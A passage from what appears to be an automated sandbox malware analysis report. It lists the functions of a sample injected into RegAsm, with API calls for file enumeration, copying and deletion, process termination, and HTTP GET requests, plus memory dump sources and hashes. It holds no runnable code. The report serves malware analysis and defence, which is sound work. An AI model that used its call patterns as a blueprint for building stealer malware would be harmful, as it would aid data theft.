                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0041675E
                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,00416AC2,?), ref: 00416872
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?,?,?,?,?,?,?,?,00416AC2,?), ref: 00416884
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strtok_swsprintf$CloseFileFindlstrcatmemset$HandleMatchNextPathSizeSpecUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                  • String ID: %s%s$%s\%s$%s\%s\%s
                                                                                                                                                                                                                                                                                                  • API String ID: 3008008253-2927280355
                                                                                                                                                                                                                                                                                                  • Opcode ID: 723228165f9c214288ddb40b34de1f30534ec9953c5203047287f0891c5065a3
                                                                                                                                                                                                                                                                                                  • Instruction ID: c7960d27603167e2095e1da8c747364c01f2345784f24c67a0cfb0406d393024
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 723228165f9c214288ddb40b34de1f30534ec9953c5203047287f0891c5065a3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2871BAB5900219ABDB24DF94DC85EEE737DEB48704F10855EF50993241EB38EE88CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00407440 Relevance: 32.1, APIs: 21, Instructions: 569stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410090: StrCmpCA.SHLWAPI(?,00000000,?,00407476,0156F7B8,?,00000000,?), ref: 0041009A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,0156F048,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 0040751F
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004077D6
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00407925
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426A98), ref: 00407934
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00407947
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426A9C), ref: 00407956
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00407969
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426AA0), ref: 00407978
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 0040798B
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426AA4), ref: 0040799A
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 004079AD
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426AA8), ref: 004079BC
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 004079CF
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426AAC), ref: 004079DE
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00407A25
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426AB0), ref: 00407A43
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(000000FF), ref: 00407AAA
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(000000FF), ref: 00407AB9
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 004077DD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411A20: memset.MSVCRT ref: 00411A55
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411A20: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,00407546,0040DA84), ref: 00411A86
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411A20: HeapAlloc.KERNEL32(00000000,?,00407546,0040DA84), ref: 00411A8D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411A20: wsprintfW.USER32 ref: 00411A9C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411A20: OpenProcess.KERNEL32(00001001,00000000), ref: 00411AFD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411A20: TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B0C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411A20: CloseHandle.KERNEL32(00000000), ref: 00411B13
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00407B10
                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?,?,?,00426A62), ref: 00407B38
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$lstrcpy$HeapProcesslstrlen$Filememset$AllocAllocateCloseCopyDeleteHandleOpenSystemTerminateTimewsprintf
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2944411387-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 518233657cb6299c0721680168a5d26dd10e2a0b98dfd8bf3f0d8e71403cf21c
                                                                                                                                                                                                                                                                                                  • Instruction ID: ac20bff3860d788065b8a73e72d727c9ff0ab2c095c62357def0f70ed4808e92
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 518233657cb6299c0721680168a5d26dd10e2a0b98dfd8bf3f0d8e71403cf21c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63325F71900248EACB14EBE4DD55BEEBB79AF19308F10417EF50273292DB786A08CB65
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00409730 Relevance: 31.9, APIs: 21, Instructions: 433stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,0156F048,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00426A9F,00000009), ref: 004097F6
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00409962
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00409969
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409AAF
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C78), ref: 00409ABE
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409AD1
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C7C), ref: 00409AE0
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409AF3
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C80), ref: 00409B02
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409B15
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C84), ref: 00409B24
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409B37
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C88), ref: 00409B46
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409B59
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C8C), ref: 00409B68
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409B7B
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C90), ref: 00409B8A
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(000000FF), ref: 00409C00
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(000000FF), ref: 00409C0F
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00409C65
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410090: StrCmpCA.SHLWAPI(?,00000000,?,00407476,0156F7B8,?,00000000,?), ref: 0041009A
                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00409C8D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1973479514-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 74e1f64ca746990e000dc16853746c1c8c4e6ee652172f2314a50c48505eac86
                                                                                                                                                                                                                                                                                                  • Instruction ID: f39e1bd7dab92496fbde9404480356453d89dcc36ccb70b28e1b0f1b61e95687
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74e1f64ca746990e000dc16853746c1c8c4e6ee652172f2314a50c48505eac86
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB025C71900148EADB14EBE4DD55BEEBB79AF19304F10817EF502B3292DB786A08CB75
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00405A80 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 200networkfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AF8
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,00000004), ref: 00405B10
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B34
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,015724D8,00000000,00000000,-00400100,00000000), ref: 00405B6B
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B8F
                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405B9A
                                                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405BB8
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,00420039), ref: 00405C05
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,00420039), ref: 00405C5B
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405C66
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00405C70
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405C7A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequestlstrlen$ConnectCrackInfoOptionQuerySendlstrcat
                                                                                                                                                                                                                                                                                                  • String ID: ERROR$ERROR$GET$;A$;A
                                                                                                                                                                                                                                                                                                  • API String ID: 1851261701-2536196751
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9429579aba8b7dc35131f515e91d8e296aee0c1f4835abc00abfe40e63ec2ece
                                                                                                                                                                                                                                                                                                  • Instruction ID: f51bac302368146bc70526799d3d27fc4bd2090a82c05307e47728f2a195adfa
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9429579aba8b7dc35131f515e91d8e296aee0c1f4835abc00abfe40e63ec2ece
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC618071900218AFEB10DBA4CC85FEFB77DEB45744F40412AFA01B3281DB786E448BA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00412350 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 323stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00412396
                                                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00412423
                                                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00412460
                                                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 004124A9
                                                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 004124F2
                                                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 0041253A
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,true,?), ref: 004126C5
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00412752
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$strtok_s
                                                                                                                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                                                                                                                  • API String ID: 2610293679-2658103896
                                                                                                                                                                                                                                                                                                  • Opcode ID: ce137c0223425141530cf3f77ebad13e5dede02dc8e5628b2fc49f88788a9856
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9783b729b2b96f1e089f7dd286e8eef65b2713682f5ee12b46c125a55e388804
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce137c0223425141530cf3f77ebad13e5dede02dc8e5628b2fc49f88788a9856
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEC10A75800109EFDB14EBA4DD85EDEB779AF05304F00816EF616A3292DA385789CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00404C00 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 194networkmemoryfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00000000), ref: 00404C5B
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00000000), ref: 00404C62
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C80
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,00000000), ref: 00404C96
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404CC1
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,015724D8,00000000,00000000,-00400100,00000000), ref: 00404CFB
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404D20
                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404D32
                                                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(000000FF,00000013,?,?,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(000000FF,?,00000400,00000001), ref: 00404DC4
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404DF5
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404DFF
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00404E09
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
